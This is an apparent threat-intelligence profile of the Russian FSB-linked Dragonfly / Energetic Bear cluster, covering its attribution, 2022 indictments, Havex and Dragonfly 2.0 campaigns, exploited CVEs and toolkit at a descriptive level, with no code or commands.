Dragonfly (also tracked as Energetic Bear, Crouching Yeti, Berserk Bear, Iron Liberty, Ghost Blizzard, TEMP.Isotope, Allanite, and MITRE ATT&CK G0035) is a Russian state-sponsored cyber-espionage and critical-infrastructure-targeting cluster active since at least 2010. The cluster is attributed to Russia's Federal Security Service (FSB), specifically Center 16 (the 16th Center for Radio-Electronic Intelligence, Military Unit 71330), the same FSB directorate that operates the Turla espionage cluster, though Dragonfly is operationally distinct and ICS/OT-focused. The 24 March 2022 unsealing of a US District of Kansas indictment named three FSB Center 16 officers, Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov, and Marat Valeryevich Tyukov, for a 2012-2017 campaign against more than 17,000 devices in 135 countries, including the Wolf Creek Nuclear Operating Corporation in Burlington, Kansas.
This indictment is the canonical public attribution. A separate same-day indictment in DC named Evgeny Viktorovich Gladkikh of TsNIIKhM (a Russian Ministry of Defense research institute) for the 2017 Triton / TRISIS attack on a Saudi petrochemical plant, that activity is the separate Xenotime cluster and must not be conflated with Dragonfly. Operationally Dragonfly is defined by sustained, methodical targeting of energy-sector business networks (electric utilities, oil and gas, nuclear, water and wastewater) and the ICS-vendor supply-chain.
The cluster's earliest publicly-documented operations (the 2011-2014 "Phase 1" Energetic Bear campaign) included trojanized ICS-software installers distributed via the compromised websites of three European ICS vendors (eWON / Talk2M, MB Connect Line / mbCONFTOOL, and MESA Imaging / SwissRanger), delivering the Havex backdoor (Backdoor.Oldrea) which performed OPC-protocol network reconnaissance against operational technology environments. That OPC scanning behavior was distinctive evidence of ICS-focused intent and remains one of the cluster's signature behaviors in retrospective analysis. The 2015-2017 "Dragonfly 2.0" campaign disclosed by Symantec in October 2017 marked a sustained second wave of operations against US, UK, Swiss, and Turkish electric utilities, including documented penetration of operational network segments and screen captures of HMI (human-machine interface) systems inside US energy networks.
Dragonfly 2.0 popularized the cluster's use of forced-authentication tradecraft (T1187): embedding single-pixel images referencing attacker-controlled SMB servers in maldoc lures and compromised energy-industry websites to harvest Net-NTLM hashes for offline cracking. From 2018 forward, operational signatures more often appear under the "Berserk Bear" label (per CrowdStrike) and "Iron Liberty" (Secureworks) and Microsoft's "Ghost Blizzard" naming. CISA's TA18- 074A (March 2018) provided the first explicit US-government attribution of the cluster's pattern of activity to the Russian state.
CISA / FBI AA20-296A (October 2020) disclosed successful compromise of two US State, Local, Tribal, and Territorial (SLTT) government networks during the 2020 US election cycle via exploitation of Citrix (CVE-2019-19781), Exchange (CVE-2020-0688), Fortinet (CVE-2018-13379), and Cisco router vulnerabilities, paired with password spraying. The cluster's toolkit is comparatively pragmatic and not heavy on bespoke implants, Havex (Backdoor.Oldrea) and Karagany (Trojan. Karagany) are the most-cited legacy implants, along with Heriplor (a backdoor unique to the cluster) and Goodor, with substantial reliance on living-off-the-land tooling (PowerShell, mshta, schtasks, rundll32, certutil) and open-source credential-access utilities (Mimikatz, Hydra, CrackMapExec, Impacket / secretsdump, PsExec).
Public attribution and the 2022 indictment have not produced a visible operational pause. As of the project handoff date, Dragonfly's operators are assessed by CISA, NCSC UK, and partner agencies to remain active against Western critical infrastructure, although 2023-2025 public reporting attributes much of the visible Russian state-aligned ICS-targeting activity to Sandworm or to less-specific "Russian state-aligned" framing rather than to the Dragonfly cluster by name. Dragos's ALLANITE designation tracks the energy-grid-focused subset of the activity.